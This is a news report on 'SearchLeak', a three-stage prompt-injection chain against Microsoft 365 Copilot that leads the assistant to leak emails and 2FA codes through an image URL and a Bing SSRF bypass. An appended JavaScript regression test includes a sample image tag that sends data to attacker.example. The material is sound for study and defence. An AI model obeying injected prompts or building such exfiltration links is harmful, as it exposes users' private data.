Microsoft Copilot 'SearchLeak' Vulnerability Exposes Sensitive Enterprise Data
Cybersecurity researchers at Varonis Threat Labs have uncovered a new three-stage vulnerability chain, named 'SearchLeak,' affecting Microsoft 365 Copilot Enterprise Search. This exploit reportedly enables attackers to access and exfiltrate sensitive information, including emails, two-factor authentication codes, and various indexed business content. The vulnerability works by combining a novel AI-specific injection with existing web bugs, effectively circumventing Copilot's built-in data protection mechanisms.

A new vulnerability dubbed 'SearchLeak' has been identified in Microsoft 365 Copilot Enterprise Search by cybersecurity researchers at Varonis Threat Labs. The vulnerability chain is described as a method to turn the AI assistant into a "silent data exfiltration weapon."
'SearchLeak' is a three-stage attack that could expose a range of sensitive data, including emails, two-factor authentication codes, meeting invites, notes, SharePoint documents, and OneDrive files. The researchers indicate that the 'blast radius' extends beyond personal data within the enterprise environment, potentially covering any content the user has access to within an organization.
The attack begins with a Parameter-to-Prompt Injection (P2P), an AI-specific vulnerability. An attacker sends a target a URL containing a malicious prompt as a query parameter. When the target clicks this link, Copilot interprets the embedded prompt as instructions, such as searching for emails and embedding their titles into an image URL.
The second stage involves an HTML injection race condition. According to Varonis, a flaw in Copilot's rendering process allows raw HTML to be temporarily displayed in the Document Object Model (DOM) during the streaming phase, before Microsoft's protective formatting is applied.
Finally, to retrieve the exposed information, the attack utilizes a Content Security Policy (CSP) bypass through Bing server-side request forgery (SSRF). The malicious prompt directs Copilot to use an attacker-controlled domain as the image URL destination, leveraging Bing's Search by Image feature as a proxy to circumvent restrictions on external image domains.
Microsoft has implemented safety guardrails in Copilot designed to prevent data exfiltration. However, 'SearchLeak' reportedly operates as a combined three-stage chain, which lets it bypass these safeguards; the individual components of the attack would likely fail on their own. According to Mashable Tech, this mechanism effectively works around Microsoft's built-in protections.
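
The second-stage rendering race described above can be modeled as a renderer regression check. This is an added example, not code from Microsoft, Varonis, or the original article. The chunk contents, the attacker.example host, and all function names are constructed for illustration, and the "format at end" model is an assumption based on the article's description.

```javascript
// Constructed sample: assistant output arriving as streamed chunks, with an
// <img> tag split across chunk boundaries. Host and query are placeholders.
const CHUNKS = [
  "Search results: <im",
  'g src="https://attacker.example/p?d=',
  'SUBJECT_LINE">',
  " end of results.",
];

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Racy model (assumption): partial frames are rendered as-is and protective
// formatting runs only once the stream has finished.
function framesFormatAtEnd(chunks) {
  const frames = [];
  let buffer = "";
  for (const chunk of chunks) {
    buffer += chunk;
    frames.push(buffer); // raw markup reaches the renderer mid-stream
  }
  frames.push(escapeHtml(buffer)); // final frame is safe, earlier ones are not
  return frames;
}

// Hardened model: the whole buffer is escaped again on every frame, so a tag
// split across chunks is never assembled as live markup.
function framesEscapeEachFrame(chunks) {
  const frames = [];
  let buffer = "";
  for (const chunk of chunks) {
    buffer += chunk;
    frames.push(escapeHtml(buffer));
  }
  return frames;
}

// Regression check for a renderer test suite: index of the first frame that
// contains the start of a resource-loading tag, or -1 if every frame is inert.
const LIVE_TAG = /<(img|iframe|script|link|video|audio|source|object|embed)\b/i;
function firstFrameWithRawTag(frames) {
  return frames.findIndex((frame) => LIVE_TAG.test(frame));
}

console.log("format-at-end:", firstFrameWithRawTag(framesFormatAtEnd(CHUNKS)));
console.log("escape-each-frame:", firstFrameWithRawTag(framesEscapeEachFrame(CHUNKS)));
```

The check asserts on every intermediate frame rather than only the final one, because the final frame is safe in both models.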


